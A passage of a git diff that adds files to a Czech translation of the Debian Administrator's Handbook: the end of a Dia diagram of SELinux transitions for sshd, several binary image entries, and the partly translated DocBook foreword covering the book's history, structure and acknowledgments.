+        <dia:connection handle="0" to="O7" connection="7"/>
+        <dia:connection handle="1" to="O8" connection="6"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Flowchart - Document" version="1" id="O12">
+      <dia:attribute name="obj_pos">
+        <dia:point val="10.7325,11.135"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="10.6825,11.085;16.0346,14.5049"/>
+      </dia:attribute>
+      <dia:attribute name="meta">
+        <dia:composite type="dict"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="10.7325,11.135"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="5.2521067811865478"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="3.3699494936611667"/>
+      </dia:attribute>
+      <dia:attribute name="line_width">
+        <dia:real val="0.10000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="line_colour">
+        <dia:color val="#000000"/>
+      </dia:attribute>
+      <dia:attribute name="fill_colour">
+        <dia:color val="#ffffff"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="line_style">
+        <dia:enum val="0"/>
+        <dia:real val="1"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.35355339059327379"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#/usr/sbin/sshd
+sshd_exec_t#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="13.3586,12.1386"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="flip_horizontal">
+        <dia:boolean val="false"/>
+      </dia:attribute>
+      <dia:attribute name="flip_vertical">
+        <dia:boolean val="false"/>
+      </dia:attribute>
+      <dia:attribute name="subscale">
+        <dia:real val="1"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O13">
+      <dia:attribute name="obj_pos">
+        <dia:point val="2.35,13.635"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="2.3,13.585;7.5075,16.385"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="2.35,13.635"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="5.1074999999999999"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="2.7000000000000002"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#SSH server
+sshd_t#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="4.90375,14.78"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O14">
+      <dia:attribute name="obj_pos">
+        <dia:point val="7.8,11.865"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="7.74987,11.4969;10.8668,12.2205"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="7.8,11.865"/>
+        <dia:point val="10.755,11.8571"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O8" connection="10"/>
+        <dia:connection handle="1" to="O12" connection="5"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O15">
+      <dia:attribute name="obj_pos">
+        <dia:point val="10.755,13.3014"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="7.35059,13.239;10.8174,14.477"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="10.755,13.3014"/>
+        <dia:point val="7.4575,14.31"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="line_style">
+        <dia:enum val="4"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O12" connection="7"/>
+        <dia:connection handle="1" to="O13" connection="6"/>
+      </dia:connections>
+    </dia:object>
+  </dia:layer>
+</dia:diagram>
diff --git a/tmp/cs-CZ/xml/images/selinux-transitions.png b/tmp/cs-CZ/xml/images/selinux-transitions.png
new file mode 100644
index 000000000..be53f64ae
Binary files /dev/null and b/tmp/cs-CZ/xml/images/selinux-transitions.png differ
diff --git a/tmp/cs-CZ/xml/images/ssh-L.dia b/tmp/cs-CZ/xml/images/ssh-L.dia
new file mode 100644
index 000000000..6aedac4d3
Binary files /dev/null and b/tmp/cs-CZ/xml/images/ssh-L.dia differ
diff --git a/tmp/cs-CZ/xml/images/ssh-L.png b/tmp/cs-CZ/xml/images/ssh-L.png
new file mode 100644
index 000000000..968e51a25
Binary files /dev/null and b/tmp/cs-CZ/xml/images/ssh-L.png differ
diff --git a/tmp/cs-CZ/xml/images/ssh-R.dia b/tmp/cs-CZ/xml/images/ssh-R.dia
new file mode 100644
index 000000000..4377665c4
Binary files /dev/null and b/tmp/cs-CZ/xml/images/ssh-R.dia differ
diff --git a/tmp/cs-CZ/xml/images/ssh-R.png b/tmp/cs-CZ/xml/images/ssh-R.png
new file mode 100644
index 000000000..33c7c5246
Binary files /dev/null and b/tmp/cs-CZ/xml/images/ssh-R.png differ
diff --git a/tmp/cs-CZ/xml/images/startup-systemd.dia b/tmp/cs-CZ/xml/images/startup-systemd.dia
new file mode 100644
index 000000000..fd6f86e3b
Binary files /dev/null and b/tmp/cs-CZ/xml/images/startup-systemd.dia differ
diff --git a/tmp/cs-CZ/xml/images/startup-systemd.png b/tmp/cs-CZ/xml/images/startup-systemd.png
new file mode 100644
index 000000000..2b86da4d5
Binary files /dev/null and b/tmp/cs-CZ/xml/images/startup-systemd.png differ
diff --git a/tmp/cs-CZ/xml/images/startup-sysvinit.dia b/tmp/cs-CZ/xml/images/startup-sysvinit.dia
new file mode 100644
index 000000000..c10cbf532
Binary files /dev/null and b/tmp/cs-CZ/xml/images/startup-sysvinit.dia differ
diff --git a/tmp/cs-CZ/xml/images/startup-sysvinit.png b/tmp/cs-CZ/xml/images/startup-sysvinit.png
new file mode 100644
index 000000000..d872690bf
Binary files /dev/null and b/tmp/cs-CZ/xml/images/startup-sysvinit.png differ
diff --git a/tmp/cs-CZ/xml/images/synaptic.png b/tmp/cs-CZ/xml/images/synaptic.png
new file mode 100644
index 000000000..f977a1fa6
Binary files /dev/null and b/tmp/cs-CZ/xml/images/synaptic.png differ
diff --git a/tmp/cs-CZ/xml/images/thunderbird.png b/tmp/cs-CZ/xml/images/thunderbird.png
new file mode 100644
index 000000000..d26d2b3e7
Binary files /dev/null and b/tmp/cs-CZ/xml/images/thunderbird.png differ
diff --git a/tmp/cs-CZ/xml/images/virtual-package.dia b/tmp/cs-CZ/xml/images/virtual-package.dia
new file mode 100644
index 000000000..f6b424d37
Binary files /dev/null and b/tmp/cs-CZ/xml/images/virtual-package.dia differ
diff --git a/tmp/cs-CZ/xml/images/virtual-package.png b/tmp/cs-CZ/xml/images/virtual-package.png
new file mode 100644
index 000000000..b819f947c
Binary files /dev/null and b/tmp/cs-CZ/xml/images/virtual-package.png differ
diff --git a/tmp/cs-CZ/xml/images/wireshark.png b/tmp/cs-CZ/xml/images/wireshark.png
new file mode 100644
index 000000000..c27b6f3b5
Binary files /dev/null and b/tmp/cs-CZ/xml/images/wireshark.png differ
diff --git a/tmp/cs-CZ/xml/images/xfce.png b/tmp/cs-CZ/xml/images/xfce.png
new file mode 100644
index 000000000..295160ef0
Binary files /dev/null and b/tmp/cs-CZ/xml/images/xfce.png differ
diff --git a/tmp/cs-CZ/xml_tmp/00b_foreword.xml b/tmp/cs-CZ/xml_tmp/00b_foreword.xml
new file mode 100644
index 000000000..63226199f
--- /dev/null
+++ b/tmp/cs-CZ/xml_tmp/00b_foreword.xml
@@ -0,0 +1,255 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE preface PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<preface id="foreword">
+  <title>Předmluva</title>
+
+  <para>Linux nabíral na síle po řadu let, a jeho rostoucí popularita pobízí více a více uživatelů, aby učinili tento skok. Prvním krokem na této cestě je vybrat distribuci. To je důležité rozhodnutí, protože každá distribuce má své vlastní zvláštnosti, a budoucím nákladům na migraci se lze vyhnout, pokud je učiněna správná volba již od začátku.</para>
+
+  <sidebar>
+    <title><emphasis>ZPĚT K ZÁKLADŮM</emphasis> Linuxová distribuce, linuxové jádro</title>
+    <indexterm><primary>Linux</primary><secondary>jádro</secondary></indexterm>
+    <indexterm><primary>Linux</primary><secondary>distribuce</secondary></indexterm>
+    <indexterm><primary>distribuce</primary><secondary>Linuxová distribuce</secondary></indexterm>
+
+    <para>Striktně vzato, Linux je pouze jádro, jádro je kus softwaru, který sídlí mezi hardwarem a aplikací.</para>
+
+    <para>“Linuxová distribuce” je úplný operační systém; To obvykle zahrnuje linuxové jádro, instalační program, a co je nejdůležitější aplikace a další software potřebný k proměně počítače na skutečně užitečný nástroj.</para>
+  </sidebar>
+
+  <para>Debian GNU/Linux je “typická” linuxová distribuce, která se hodí pro většinu uživatelů. Účelem této knihy je ukázat mnoho jejích aspektů, aby jste mohli učinit rozhodnutí založené na co nejvíce informacích.</para>
+
+  <section id="sect.why-this-book">
+    <title>Proč tato kniha?</title>
+
+    <sidebar>
+      <title><emphasis>KULTURA</emphasis> Komerční distribuce</title>
+      <indexterm><primary> distribuce </primary> <secondary> komerční distribuce </secondary></indexterm>
+
+      <para>Most Linux distributions are backed by a for-profit company
+      that develops them and sells them under some kind of commercial
+      scheme. Examples include <emphasis>Ubuntu</emphasis>, mainly
+      developed by <emphasis>Canonical Ltd.</emphasis>; <emphasis>Red Hat
+      Enterprise Linux</emphasis>, by <emphasis>Red Hat</emphasis>;
+      and <emphasis>SUSE Linux</emphasis>, maintained and made commercially
+      available by <emphasis>Novell</emphasis>.</para>
+
+      <para>Na druhém konci spektra leží podoby Debianu a Apache Software Foundation (který zabezpečuje vývoj pro webový server Apache). Debian je především projekt ve světě svobodného softwaru, implementovaný dobrovolníky, kteří spolupracují prostřednictvím internetu. Zatímco někteří z nich pracují na Debianu jako na součásti své placené práce v různých společnostech, projekt jako celek není nijak zvlášť spojen s žádnou společností a ani žádná společnost nemá v projektu větší slovo než co mají dobrovolní přispěvatelé.</para>
+    </sidebar>
+
+    <para>Linux has gathered a fair amount of media coverage over the
+    years; it mostly
+    benefits the distributions supported by a real marketing department —
+    in other words, company-backed distributions (Ubuntu, Red Hat,
+    SUSE, and so on). But Debian is far from being a marginal
+    distribution; multiple studies have shown over the years that it is
+    widely used both on servers and on desktops. This
+    is particularly true among webservers where Debian and Ubuntu are the leading
+    Linux distributions.
+    <ulink type="block" url="https://w3techs.com/technologies/details/os-debian/all/all" /></para>
+
+    <para>Účelem této knihy je pomoci vám poznat tuto distribuci. Doufáme, že se nám podaří sdílet zkušenosti, které jsme nashromáždili od doby, kdy jsme se připojili k projektu jako vývojáři a přispěvatelé v roce 1998 (Raphaël) a v roce 2000 (Roland). S trochou štěstí bude naše nadšení nakažlivé a možná se k nám někdy připojíte...</para>
+
+    <para>První vydání této knihy (v roce 2004) sloužilo k vyplnění mezery: byla to první kniha ve francouzském jazyce, která se zaměřila výhradně na Debian. V té době, mnoho dalších knih bylo napsáno na toto téma jak pro francouzsky mluvící, tak i pro anglicky mluvící čtenáře. Bohužel téměř žádné z nich se nedostávalo aktualizací, a v průběhu let situace sklouzla zpět do pozice, kdy bylo o Debianu jen velmi málo dobrých knih. Doufáme, že tato kniha, která začala svůj nový život překladem do angličtiny (a několika překlady z angličtiny do různých jiných jazyků), zaplní tuto mezeru a pomůže mnoha uživatelům.</para>
+  </section>
+  <section id="sect.who-is-this-book-for">
+    <title>Pro koho je tato kniha?</title>
+
+    <para>Snažili jsme se, aby tato kniha byla užitečná pro více kategorií čtenářů. Zaprvé, správci systémů (začátečníci i zkušení) najdou vysvětlení instalace a nasazení Debianu na více počítačích. Budou mít také přehled o většině služeb, které jsou v Debianu k dispozici, spolu s odpovídajícími konfiguračními pokyny a popisem specifik pocházejících z distribuce. Pochopení mechanismů, použitých při vývoji Debianu, jim umožní vypořádat se s nepředvídanými problémy, s tím, že mohou vždy najít pomoc v rámci komunity.</para>
+
+    <para>Uživatelé jiné linuxové distribuce nebo jiné varianty Unixu objevoví specifika Debianu a měli by být velmi rychle akceschopní a zároveň plně těžit z jedinečných výhod této distribuce.</para>
+
+    <para>A konečně, čtenáři, kteří již mají nějaké znalosti o Debianu a chtějí se dozvědět více o komunitě stojící za ním by měli mít svá očekávání naplněna. Tato kniha by je měla přiblížit k tomu se k nám připojit a stát se přispěvateli.</para>
+  </section>
+  <section id="sect.selected-approach">
+    <title>Obecný přístup</title>
+
+    <para>Veškerá obecná dokumentace, kterou o GNU/Linuxu najdete, se vztahuje i na Debian, protože Debian věšinou obsahuje běžný svobodný software. Nicméně, distribuce přináší mnoho vylepšení, což je důvod, proč jsme se rozhodli především popsat “Debianovský způsob” dělání věci.</para>
+
+    <para>Je zajímavé sledovat doporučení Debianu ale ještě lepší je pochopit jejich původ. Proto se nebudeme omezovat pouze na praktická vysvětlení; Budeme také popisovat práci projektu, abychom vám poskytli komplexní a konzistentní znalosti.</para>
+  </section>
+  <section id="sect.book-structure">
+    <title>truktura knihy</title>
+
+    <para>This book is built around a case study providing both support and
+    illustration for all topics being addressed.</para>
+
+    <sidebar>
+      <title><emphasis>POZNÁMKA</emphasis> Webové stránky, emaily autorů</title>
+
+      <para>Tato kniha má své vlastní webové stránky, které obsahují různé užitečné prvky. Zejména obsahují online verzi knihy s odkazy na kliknutí, a případné chyby. Neváhejte si je prohlédnut a nechat nám nějakou zpětnou vazbu. Rádi si přečteme vaše komentáře nebo zprávy. Pošlete je e-mailem na <email>hertzog@debian.org</email> (Raphaël) a <email>lolando@debian.org</email> (Roland).<ulink type="block" url="http://debian-handbook.info/" /></para>
+    </sidebar>
+
+    <para><emphasis role="strong">Kapitola 1</emphasis> se zaměřuje na netechnickou prezentaci projektu Debian a popisuje její cíle a organizaci. Tyto aspekty jsou důležité, protože definují obecný rámec, který další kapitoly doplní konkrétnějšími informacemi.</para>
+
+    <para><emphasis role="strong">Kapitoly 2 a 3</emphasis> poskytují široký nástin případové studie. V tomto bodě by si mohli začínající čtenáři najít čas na čtení <emphasis role="strong">dodatku B</emphasis>, kde najdetou krátký doučovací kurz vysvětlující řadu základních počítačových pojmů, stejně jako koncepty vlastní jakémukoliv Unixovému systému.</para>
+
+    <para>Abychom se dostali k podstatě předmětu, zcela přirozeně začneme procesem instalace (<emphasis role="strong">Kapitola 4</emphasis>); <emphasis role="strong">kapitoly 5 a 6</emphasis> představí základní nástroje, které bude používat každý správce Debianu, jako jsou ty z rodiny <emphasis role="strong">APT</emphasis> , která je z velké části zodpovědná za vynikající reputaci distribuce. Tyto kapitoly nejsou nijak omezeny na profesionály, protože doma je každý svým vlastním administrátorem.</para>
+
+    <para><emphasis role="strong">Kapitola 7</emphasis> bude důležitá vsuvka; Popisuje pracovní postupy k efektivnímu používání dokumentace a rychlému pochopení problémů, za účelem jejich vyřešení.</para>
+
+    <para>Následující kapitoly budou podrobnější prohlídkou systému, počínaje základní infrastrukturou a službami (<emphasis role="strong">kapitoly 8 až 10</emphasis>) a postupně se zásobníkem se dostaneme až k uživatelským aplikacím v <emphasis role="strong">kapitole 13</emphasis>. <emphasis role="strong">Kapitola 12</emphasis> se zabývá pokročilejšími předměty, které se nejvíce přímo týkají správců velkých souborů počítačů (včetně serverů), zatímco <emphasis role="strong">Kapitola 14</emphasis> je stručný úvod do širšího předmětu počítačové bezpečnosti a dává několik návodů, jak se vyhnout většině problémů.</para>
+
+    <para><emphasis role="strong">Kapitola 15</emphasis> je pro administrátory, kteří chtějí jít dál a vytvořit si vlastní debianovské balíčky.</para>
+
+    <sidebar>
+      <title><emphasis>Slovní zásoba</emphasis> Balíček Debianu</title>
+      <indexterm><primary>balíček</primary> <secondary>Balíček Debianu</secondary></indexterm>
+      <indexterm><primary>balíček</primary> <secondary>binární balíček</secondary></indexterm>
+      <indexterm><primary>balíček</primary> <secondary>zdrojový balíček</secondary></indexterm>
+      <indexterm><primary>zdroj</primary> <secondary>balíček</secondary></indexterm>
+
+      <para>Balíček Debianu je archiv obsahující všechny soubory potřebné k instalaci softwaru. Obvykle se jedná o soubor s příponou <filename>deb</filename> , který lze zpracovat příkazem <command>dpkg</command>. Také nazývaný <emphasis>binární balíček</emphasis>obsahuje soubory, které lze přímo použít (například programy nebo dokumentace). Na druhou stranu <emphasis>zdrojový balíček</emphasis> obsahuje zdrojový kód pro software a pokyny potřebné pro sestavení binárního balíčku.</para>
+    </sidebar>
+
+    <para>The present version is already the eighth edition of the book
+    (we include the first four that were only available in French).
+    This edition covers version 9 of Debian, code-named <emphasis role="distribution">Stretch</emphasis>. Among the changes, Debian
+    now sports a new architecture — <emphasis>mips64el</emphasis> for
+    little-endian 64-bit MIPS processors. On the opposite side,
+    the <emphasis>powerpc</emphasis> architecture has been dropped due
+    to lack of volunteers to keep up with development (which itself can be
+    explained by the fact that associated hardware is getting old and less
+    interesting to work on). All included packages have
+    obviously been updated, including the GNOME desktop, which is now in
+    its version 3.22. Most executables have been rebuilt with
+    PIE build flags thus enabling supplementary hardening measures
+    (Address Space Layout Randomization, ASLR).</para>
+
+    <para>Přidali jsme nějaké poznámky a boční komentáře. Mají různé role: mohou upozornit na obtížný bod, dokončit myšlenku případové studie, definovat některé termíny, nebo sloužit jako připomenutí. Zde je seznam nejběžnějších bočních poznámek:</para>
+    <itemizedlist>
+      <listitem>
+	<para>ZPĚT k ZÁKLADŮM: připomínka některých informací, které mají být známy;</para>
+      </listitem>
+      <listitem>
+	<para>SLOVNÍ ZÁSOBA: definuje technický termín, někdy specifický pro Debian;</para>
+      </listitem>
+      <listitem>
+	<para>KOMUNITA: poukazuje na důležité osoby nebo role v rámci projektu;</para>
+      </listitem>
+      <listitem>
+	<para>ZÁSADY: pravidlo nebo doporučení ze zásad Debianu. Tento dokument je nezbytný v rámci projektu a popisuje, jak balíčkovat software. Části zásad zvýrazněné v této příručce přináší uživatelům přímé výhody (například s vědomím, že zásady standardizují umístění dokumentace a příklady usnadňují najít je i v novém balíčku).</para>
+      </listitem>
+      <listitem>
+	<para>Nástroj: představuje příslušný nástroj nebo službu;</para>
+      </listitem>
+      <listitem>
+	<para>V praxi: teorie nemusí vždy odpovídat praxi; tyto boční poznámky obsahují rady vyplývající z našich zkušeností. Mohou také poskytnout podrobné a konkrétní příklady;</para>
+      </listitem>
+      <listitem>
+	<para>ostatní více či méně časté boční komentáře jsou do jisté míry zřejmé: KULTURA, TIP, UPOZORNĚNÍ, JDĚTE DÁL, BEZPEČNOST, a tak dále.</para>
+      </listitem>
+    </itemizedlist>
+  </section>
+  
+  
+  <section id="sect.acknowledgments">
+    <title>Poděkování</title>
+    <section>
+      <title>Trocha historie</title>
+
+      <para>V roce 2003, kontaktoval Nat Makarévitch Raphaëla, protože chtěl zveřejnit knihu o Debianu v kolekci <foreignphrase>Cahier de l'Admin</foreignphrase> (Příruček pro správce), kterou měl na starosti pro Eyrolles, předního francouzského vydavatele technických knih. Raphaël okamžitě souhlasil, že ji napíše. První vydání vyšlo 14.října 2004 a mělo obrovský úspěch - bylo vyprodáno sotva o čtyři měsíce později.</para>
+
+      <para>Since then, we have released 7 other editions of the
+      French book, one for each subsequent Debian release.  Roland,
+      who started working on the book as a proofreader, gradually
+      became its co-author.</para>
+
+      <para>I když jsme byli samozřejmě spokojeni s úspěchem knihy, vždy jsme doufali, že Eyrolles přesvědčí nějakého mezinárodního vydavatele, aby ji přeložil do angličtiny. Obdrželi jsme četné komentáře vysvětlující, jak kniha pomohla lidem s Debianem začít a byli jsme dychtiví, aby i ostatní měli z knihy stejný prospěch.</para>
+
+      <para>Alas, no English-speaking editor that we contacted was willing
+      to take the risk of translating and publishing the book. Not put off
+      by this small setback, we negotiated with our French editor
+      Eyrolles and got back the necessary rights to translate the book
+      into English and publish it ourselves. Thanks to a <ulink url="http://www.ulule.com/debian-handbook/">successful
+        crowdfunding campaign</ulink>, we worked on the translation between December
+      2011 and May 2012. The “Debian Administrator's Handbook” was born
+      and it was published under a free-software license!
+      </para>
+
+      <para>While this was an important milestone, we already knew that
+      the story would not be over for us until we could contribute the
+      French book as an official translation of the English book. This
+      was not possible at that time because the French book was still
+      distributed commercially under a non-free license by Eyrolles.</para>
+
+      <para>In 2013, the release of Debian 7 gave us a good opportunity to
+      discuss a new contract with Eyrolles. We convinced them that a
+      license more in line with the Debian values would contribute to the
+      book's success. That wasn't an easy deal to make, and we agreed
+      to setup another <ulink url="http://www.ulule.com/liberation-cahier-admin-debian/">crowdfunding
+        campaign</ulink> to cover some of the costs and reduce the risks
+      involved. The operation was again a huge success and in July 2013,
+      we added a French translation to the Debian Administrator's
+      Handbook.</para>
+      <para>Rádi bychom poděkovali všem, kteří se připojili k těmto kampaním veřejného financování, buďto tím, že poskytli nějaké peníze, nebo tím, že se zmínili ve svém okolí. Bez vás bychom to nezvládli.</para>
+      <para>
+        To save some paper, 5 years after the fundraising campaigns and after
+        two subsequent editions, we dropped the list of persons who opted
+        to be rewarded with a mention of their name in the book. But
+        their names are engraved in the acknowledgments of the Wheezy edition
+        of the book:
+        <ulink type="block" url="https://debian-handbook.info/browse/wheezy/sect.acknowledgments.html" />
+      </para>
+    </section>
+    <section>
+      <title>Zvláštní poděkování přispěvatelům</title>
+
+      <para>Tato kniha by nebyla tím, čím je, bez přispění několika osob, které hrály důležitou roli během překladatelské fáze i mimo ni. Rádi bychom poděkovali Marilyne Brun, která nám pomohla přeložit vzorovou kapitolu a která s námi pracovala na definování některých společných překladatelských pravidel. Revidovala také několik kapitol, které zoufale potřebovaly dopracovat. Děkuji Anthony Baldwinovi (z Baldwin Linguas), který pro nás překládal několik kapitol.</para>
+
+      <para>Těžíme z velkorysé pomoci korektorů: Daniel Phillips, Gerold Rupprecht, Gordon ony, Jákob Owens, a tom Syroid. Každý z nich zrevidoval mnoho kapitol. Mockrát děkuji!</para>
+
+      <para>Poté, co anglická verze byla uvolněna, jsme samozřejmě dostali spoustu ohlasů, návrhů na opravy od čtenářů, a ještě více od mnoha týmů, které se zavázali přeložit tuto knihu do ostatních jazyků. Díky!</para>
+
+      <para>Chtěli bychom také poděkovat čtenářům francouzské knihy, kteří nám poskytli ohlasy, co potvrzovaly, že kniha opravdu stála za to ji přeložit, děkuji: Christian Perrier, David Bercot, Étienne Liétart, a Gilles Roussi. Stefano Zacchiroli - který byl vedoucím projektu Debian během kampaně veřejného financování - si také zaslouží velké poděkování, on laskavě schválil projekt s vysvětlujícím sdělením, že svobodné (as in freedom) knihy bylo více než třeba.</para>
+
+      <para>Máte-li to potěšení číst tyto řádky v brožované kopii knihy, pak byste se měli připojit k nám a poděkovat Benoît Guillonovi, Jean-Côme Charpentierovi, a Sébastienu Menginovi, kteří pracovali na vnitřním designu knihy. Benoît je upstream autor <ulink url="http://dblatex.sourceforge.net"> dblatexu </ulink> — nástroje, který jsme použili pro převedení DocBooku na LaTeX (a pak PDF). Sébastien je designér, který vytvořil tento pěkný knižní layout a Jean-Côme je odborník na LaTeX, který jej implementoval jako StyleSheet použitelný s dblatexem. Děkuji vám kluci za všechnu tvrdou práci!</para>
+
+      <para>A konečně, děkuji Thierry Stempfelovi za pěkné obrázky uvádějící každou kapitolu, a děkuji Doru Patrascoci za krásný obal této knihy.</para>
+    </section>
+    <section>
+      <title>Díky překladatelům</title>
+      <para>Ever since the book has been freed, many volunteers have been
+      busy translating it to numerous languages, such as Arabic, Brazilian
+      Portuguese, German, Italian, Spanish, Japanese, Norwegian
+      Bokmål, etc. Discover the full list of translations on the book's
+      website:
+      <ulink url="http://debian-handbook.info/get/#other" />
+      </para>
+      
+      <para>Rádi bychom poděkovali všem překladatelům a recenzentům překladů. Vaše práce je vysoce ceněna, protože přináší Debian do rukou miliónů lidí, kteří neumí číst anglicky.</para>
+    </section>
+    <section>
+      <title>Osobní poděkování od Raphaëla</title>
+
+      <para>Za prvé, rád bych poděkoval Natovi Makarévitchovi, který mi nabídl možnost napsat tuto knihu a který mi poskytl pevné vedení, během roku, který byl potřeba k jejímu dokončení. Děkuji také bezva týmu v Eyrolles, a Muriele Shan SEI Fanové zejména. Byla se mnou velmi trpělivá a hodně jsem se s ní naučil.</para>
+
+      <para>Období kampaní na Ulule bylo pro mě velmi náročné, ale chtěl bych poděkovat všem, kteří pomáhali, aby byly úspěšné, a zejména týmu Ulule, který reagoval velmi rychle na mnoho mých požadavků. Děkuji také všem, kteří propagovali tyto akce. Nemám žádný vyčerpávající seznam (a kdybych měl, byl by pravděpodobně příliš dlouhý), ale rád bych poděkoval několika lidem, kteří se mnou byli v kontaktu: Joey-Elijah Sneddon a Benjamin Humphrey z OMG! Ubuntu, Florent Zara z LinuxFr.org, Manu z Korben.info, Frédéric Couchet z April.org, Jake Edge z Linux Weekly News, Clement Lefebvre z Linux Mint, Ladislav Bodnar z DistroWatch, Steve kemp z Debian-Administration.org, Christian Pfeiffer Jensen z Debian-News.net, Artem Nosulchik z LinuxScrew.com, Stephan Ramoin z Gandi.net, Matthew Bloch z Bytemark.co.uk, tým na Divergence FM, Rikki Kite z Linux New Media, Jono Bacon, marketingový tým Eyrolles, a mnoho dalších, na které jsem zapomněl (omlouvám se za to).</para>
+
+      <para>Chtěl bych se zaměřit na zvláštní poděkování Rolandu Masovi, mému spoluautorovi. Spolupracujeme na této knize od začátku a on byl vždy připraven na tuto výzvu. A musím říci, že dokončení Administrátorské příručky bylo hodně práce...</para>
+
+      <para>V neposlední řadě děkuji své manželce Sophii. Ona mě velmi podporuje v mé práci na této knize a na Debianu všeobecně. Bylo příliš mnoho dní (a nocí), kdy jsem ji nechal samotnou s našimi dvěma syny, abych v práci na knize udělal nějaký pokrok. Jsem vděčný za její podporu a vím, jaké mám štěstí, že ji mám.</para>
+    </section>
+    <section>
+      <title>Osobní poděkování od Rolanda</title>
+
+      <para>Takže Raphaël mě už předešel ve většině poděkování. Stejně ještě zdůrazím své osobní poděkování dobrým lidem v Eyrolles, s nimiž spolupráce byla vždy příjemná a snadná. Doufejme, že výsledky jejich vynikajícího sdělení nebyly ztraceny v překladu.</para>
+
+      <para>Jsem nesmírně vděčný Raphaëlovi za převzetí administrativní části tohoto anglického vydání. Od organizování kampaně na financování po poslední detaily rozvržení knihy, vydávat přeloženou knihu je mnohem víc než jen překládání a korektury, a Raphaël udělal (nebo delegoval a kontroloval) to všechno. Takže díky.</para>
+
+      <para>Děkujeme také všem, kteří více či méně přímo přispěli k této knize, tím, že poskytnuli objasnění nebo vysvětlení, nebo překladatelské rady. Je jich příliš mnoho na to je zmínit, ale většinu z nich lze obvykle nalézt na různých #debian-* IRC kanálech.</para>
+
+      <para>Je tu samozřejmě určité překrytí s předchozí skupinou lidí, ale zvláštní poděkování je jistě v pořádku lidem, kteří nyní dělají Debian. Bez nich by z knihy moc nebylo, a já jsem stále ohromen tím, co projekt Debian jako celek produkuje a zpřístupňuje každému a všem.</para>
+
+      <para>Další osobní poděkování patří mým přátelům a mým klientům, za jejich porozumění, když jsem byl méně vstřícný, protože jsem pracoval na této knize, a také pro jejich neustálou podporu, povzbuzení a hecování. Oni vědí o kom mluvím. Díky.</para>
+
+      <para>And finally; I am sure they would be surprised by being
+      mentioned here, but I would like to extend my gratitude to Terry
+      Pratchett, Jasper Fforde, Tom Holt, William Gibson, Neal
+      Stephenson, and of course the late Douglas Adams. The countless
+      hours I spent enjoying their books are directly responsible for
+      my being able to take part in translating one first and writing
+      new parts later.</para>
+    </section>
+  </section>
+</preface>
diff --git a/tmp/cs-CZ/xml_tmp/01_the-debian-project.xml b/tmp/cs-CZ/xml_tmp/01_the-debian-project.xml
new file mode 100644
index 000000000..b17dbdc12
--- /dev/null
+++ b/tmp/cs-CZ/xml_tmp/01_the-debian-project.xml
@@ -0,0 +1,1601 @@
+<?xml version='1.0' encoding='utf-8' ?>
